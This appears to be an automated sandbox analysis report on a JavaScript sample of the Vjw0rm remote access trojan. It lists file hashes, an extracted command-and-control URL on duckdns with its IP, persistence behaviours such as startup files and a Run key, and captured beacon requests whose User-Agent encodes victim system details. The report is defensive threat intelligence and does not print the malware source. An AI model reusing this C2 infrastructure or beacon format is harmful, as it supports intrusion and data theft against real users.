Analysis

  • max time kernel
    145s
  • max time network
    149s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20231222-en
  • resource tags

    arch:x64 arch:x86 image:win10v2004-20231222-en locale:en-us os:windows10-2004-x64 system
  • submitted
    17/02/2024, 04:40 UTC

General

  • Target

    9b647c40e98c2de028ce703d6b5558b6a9a9d75a59c7cdd81d78e71aea0c25d7.js

  • Size

    6KB

  • MD5

    edd277e7a04ec062c49bafdb7d8b07af

  • SHA1

    1ff9c18bacf61a830f4f7001c5e19f8868ceb6b8

  • SHA256

    9b647c40e98c2de028ce703d6b5558b6a9a9d75a59c7cdd81d78e71aea0c25d7

  • SHA512

    fe118202237beae08ed786fa6905c418e18c9b27a40083911ebe77bd23c7584124eb5ff4422a0b9f9d49f7dbc7a618b2a30cefc938cdbcb36cc30d6b711778af

  • SSDEEP

    96:FnYZH1uypXd3HofJBslCFGJc9lBdqlr+bXcCnTBw5BdeCldb+rNeUo0:BYZVhDrLlriXcCnTBw5BdnldCrNHo0

Malware Config

Extracted

Family

vjw0rm

C2

http://newyear7250.duckdns.org:7250

Signatures

  • Vjw0rm

    Vjw0rm is a remote access trojan written in JavaScript.

  • Blocklisted process makes network request 1 IoCs
  • Drops startup file 2 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

Processes

  • C:\Windows\system32\wscript.exe
    wscript.exe C:\Users\Admin\AppData\Local\Temp\9b647c40e98c2de028ce703d6b5558b6a9a9d75a59c7cdd81d78e71aea0c25d7.js
    • Blocklisted process makes network request
    • Drops startup file
    • Adds Run key to start application
    PID:472

Network

  • flag-us
    DNS
    newyear7250.duckdns.org
    wscript.exe
    Remote address:
    8.8.8.8:53
    Request
    newyear7250.duckdns.org
    IN A
    Response
    newyear7250.duckdns.org
    IN A
    194.147.140.174
  • flag-ua
    POST
    http://newyear7250.duckdns.org:7250/Vre
    wscript.exe
    Remote address:
    194.147.140.174:7250
    Request
    POST /Vre HTTP/1.1
    Accept: */*
    User-Agent: NEWYEAR_92773AA9\ZHCNTALV\Admin\Microsoft Windows 10 Pro\undefined\\YES\FALSE\
    Accept-Language: en-us
    UA-CPU: AMD64
    Accept-Encoding: gzip, deflate
    Host: newyear7250.duckdns.org:7250
    Content-Length: 0
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Transfer-Encoding: chunked
    Server: Microsoft-HTTPAPI/2.0
    Date: Sat, 17 Feb 2024 04:40:58 GMT
  • flag-ua
    POST
    http://newyear7250.duckdns.org:7250/Vre
    wscript.exe
    Remote address:
    194.147.140.174:7250
    Request
    POST /Vre HTTP/1.1
    Accept: */*
    User-Agent: NEWYEAR_92773AA9\ZHCNTALV\Admin\Microsoft Windows 10 Pro\undefined\\YES\FALSE\
    Accept-Language: en-us
    UA-CPU: AMD64
    Accept-Encoding: gzip, deflate
    Host: newyear7250.duckdns.org:7250
    Content-Length: 0
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Transfer-Encoding: chunked
    Server: Microsoft-HTTPAPI/2.0
    Date: Sat, 17 Feb 2024 04:41:28 GMT
  • flag-ua
    POST
    http://newyear7250.duckdns.org:7250/Vre
    wscript.exe
    Remote address:
    194.147.140.174:7250
    Request
    POST /Vre HTTP/1.1
    Accept: */*
    User-Agent: NEWYEAR_92773AA9\ZHCNTALV\Admin\Microsoft Windows 10 Pro\undefined\\YES\FALSE\
    Accept-Language: en-us
    UA-CPU: AMD64
    Accept-Encoding: gzip, deflate
    Host: newyear7250.duckdns.org:7250
    Content-Length: 0
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Transfer-Encoding: chunked
    Server: Microsoft-HTTPAPI/2.0
    Date: Sat, 17 Feb 2024 04:41:57 GMT
  • flag-ua
    POST
    http://newyear7250.duckdns.org:7250/Vre
    wscript.exe
    Remote address:
    194.147.140.174:7250
    Request
    POST /Vre HTTP/1.1
    Accept: */*
    User-Agent: NEWYEAR_92773AA9\ZHCNTALV\Admin\Microsoft Windows 10 Pro\undefined\\YES\FALSE\
    Accept-Language: en-us
    UA-CPU: AMD64
    Accept-Encoding: gzip, deflate
    Host: newyear7250.duckdns.org:7250
    Content-Length: 0
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Transfer-Encoding: chunked
    Server: Microsoft-HTTPAPI/2.0
    Date: Sat, 17 Feb 2024 04:42:26 GMT
  • flag-ua
    POST
    http://newyear7250.duckdns.org:7250/Vre
    wscript.exe
    Remote address:
    194.147.140.174:7250
    Request
    POST /Vre HTTP/1.1
    Accept: */*
    User-Agent: NEWYEAR_92773AA9\ZHCNTALV\Admin\Microsoft Windows 10 Pro\undefined\\YES\FALSE\
    Accept-Language: en-us
    UA-CPU: AMD64
    Accept-Encoding: gzip, deflate
    Host: newyear7250.duckdns.org:7250
    Content-Length: 0
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Transfer-Encoding: chunked
    Server: Microsoft-HTTPAPI/2.0
    Date: Sat, 17 Feb 2024 04:42:54 GMT
  • flag-ua
    POST
    http://newyear7250.duckdns.org:7250/Vre
    wscript.exe
    Remote address:
    194.147.140.174:7250
    Request
    POST /Vre HTTP/1.1
    Accept: */*
    User-Agent: NEWYEAR_92773AA9\ZHCNTALV\Admin\Microsoft Windows 10 Pro\undefined\\YES\FALSE\
    Accept-Language: en-us
    UA-CPU: AMD64
    Accept-Encoding: gzip, deflate
    Host: newyear7250.duckdns.org:7250
    Content-Length: 0
    Connection: Keep-Alive
    Cache-Control: no-cache
  • flag-us
    DNS
    28.118.140.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    28.118.140.52.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    174.140.147.194.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    174.140.147.194.in-addr.arpa
    IN PTR
    Response
    174.140.147.194.in-addr.arpa
    IN PTR
    194147170174 zero-logsvpn
  • flag-us
    DNS
    79.121.231.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    79.121.231.20.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    68.32.126.40.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    68.32.126.40.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    180.178.17.96.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    180.178.17.96.in-addr.arpa
    IN PTR
    Response
    180.178.17.96.in-addr.arpa
    IN PTR
    a96-17-178-180.deploy.static.akamaitechnologies.com
  • flag-us
    DNS
    95.221.229.192.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    95.221.229.192.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    209.205.72.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    209.205.72.20.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    217.106.137.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    217.106.137.52.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    50.23.12.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    50.23.12.20.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    56.126.166.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    56.126.166.20.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    217.135.221.88.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    217.135.221.88.in-addr.arpa
    IN PTR
    Response
    217.135.221.88.in-addr.arpa
    IN PTR
    a88-221-135-217.deploy.static.akamaitechnologies.com
  • flag-us
    DNS
    0.205.248.87.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    0.205.248.87.in-addr.arpa
    IN PTR
    Response
    0.205.248.87.in-addr.arpa
    IN PTR
    https-87-248-205-0.lgw.llnw.net
  • flag-us
    DNS
    43.229.111.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    43.229.111.52.in-addr.arpa
    IN PTR
    Response
  • flag-us
    GET
    https://tse1.mm.bing.net/th?id=OADD2.10239317300952_1E3SWPMLL78HDQL83&pid=21.2&w=1920&h=1080&c=4
    Remote address:
    204.79.197.200:443
    Request
    GET /th?id=OADD2.10239317300952_1E3SWPMLL78HDQL83&pid=21.2&w=1920&h=1080&c=4 HTTP/2.0
    host: tse1.mm.bing.net
    accept: */*
    accept-encoding: gzip, deflate, br
    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
    Response
    HTTP/2.0 200
    cache-control: public, max-age=2592000
    content-length: 247144
    content-type: image/jpeg
    x-cache: TCP_HIT
    access-control-allow-origin: *
    access-control-allow-headers: *
    access-control-allow-methods: GET, POST, OPTIONS
    timing-allow-origin: *
    report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth"}]}
    nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
    accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    x-msedge-ref: Ref A: B941ED7E26084C51942E31FF8DF97B9A Ref B: LON04EDGE0910 Ref C: 2024-02-17T04:42:10Z
    date: Sat, 17 Feb 2024 04:42:09 GMT
  • flag-us
    DNS
    88.65.42.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    88.65.42.20.in-addr.arpa
    IN PTR
    Response
  • 194.147.140.174:7250
    http://newyear7250.duckdns.org:7250/Vre
    http
    wscript.exe
    2.4kB
    1.1kB
    13
    12

    HTTP Request

    POST http://newyear7250.duckdns.org:7250/Vre

    HTTP Response

    200

    HTTP Request

    POST http://newyear7250.duckdns.org:7250/Vre

    HTTP Response

    200

    HTTP Request

    POST http://newyear7250.duckdns.org:7250/Vre

    HTTP Response

    200

    HTTP Request

    POST http://newyear7250.duckdns.org:7250/Vre

    HTTP Response

    200

    HTTP Request

    POST http://newyear7250.duckdns.org:7250/Vre

    HTTP Response

    200

    HTTP Request

    POST http://newyear7250.duckdns.org:7250/Vre
  • 204.79.197.200:443
    tls, https
    82 B
    40 B
    1
    1
  • 204.79.197.200:443
    322 B
    7
  • 204.79.197.200:443
    https://tse1.mm.bing.net/th?id=OADD2.10239317300952_1E3SWPMLL78HDQL83&pid=21.2&w=1920&h=1080&c=4
    tls, http2
    13.3kB
    264.6kB
    206
    204

    HTTP Request

    GET https://tse1.mm.bing.net/th?id=OADD2.10239317300952_1E3SWPMLL78HDQL83&pid=21.2&w=1920&h=1080&c=4

    HTTP Response

    200
  • 8.8.8.8:53
    newyear7250.duckdns.org
    dns
    wscript.exe
    69 B
    85 B
    1
    1

    DNS Request

    newyear7250.duckdns.org

    DNS Response

    194.147.140.174

  • 8.8.8.8:53
    28.118.140.52.in-addr.arpa
    dns
    72 B
    158 B
    1
    1

    DNS Request

    28.118.140.52.in-addr.arpa

  • 8.8.8.8:53
    174.140.147.194.in-addr.arpa
    dns
    74 B
    117 B
    1
    1

    DNS Request

    174.140.147.194.in-addr.arpa

  • 8.8.8.8:53
    79.121.231.20.in-addr.arpa
    dns
    72 B
    158 B
    1
    1

    DNS Request

    79.121.231.20.in-addr.arpa

  • 8.8.8.8:53
    68.32.126.40.in-addr.arpa
    dns
    71 B
    157 B
    1
    1

    DNS Request

    68.32.126.40.in-addr.arpa

  • 8.8.8.8:53
    180.178.17.96.in-addr.arpa
    dns
    72 B
    137 B
    1
    1

    DNS Request

    180.178.17.96.in-addr.arpa

  • 8.8.8.8:53
    95.221.229.192.in-addr.arpa
    dns
    73 B
    144 B
    1
    1

    DNS Request

    95.221.229.192.in-addr.arpa

  • 8.8.8.8:53
    209.205.72.20.in-addr.arpa
    dns
    72 B
    158 B
    1
    1

    DNS Request

    209.205.72.20.in-addr.arpa

  • 8.8.8.8:53
    217.106.137.52.in-addr.arpa
    dns
    73 B
    147 B
    1
    1

    DNS Request

    217.106.137.52.in-addr.arpa

  • 8.8.8.8:53
    50.23.12.20.in-addr.arpa
    dns
    70 B
    156 B
    1
    1

    DNS Request

    50.23.12.20.in-addr.arpa

  • 8.8.8.8:53
    56.126.166.20.in-addr.arpa
    dns
    72 B
    158 B
    1
    1

    DNS Request

    56.126.166.20.in-addr.arpa

  • 8.8.8.8:53
    217.135.221.88.in-addr.arpa
    dns
    73 B
    139 B
    1
    1

    DNS Request

    217.135.221.88.in-addr.arpa

  • 8.8.8.8:53
    0.205.248.87.in-addr.arpa
    dns
    71 B
    116 B
    1
    1

    DNS Request

    0.205.248.87.in-addr.arpa

  • 8.8.8.8:53
    43.229.111.52.in-addr.arpa
    dns
    72 B
    158 B
    1
    1

    DNS Request

    43.229.111.52.in-addr.arpa

  • 8.8.8.8:53
    88.65.42.20.in-addr.arpa
    dns
    70 B
    156 B
    1
    1

    DNS Request

    88.65.42.20.in-addr.arpa

MITRE ATT&CK Enterprise v15
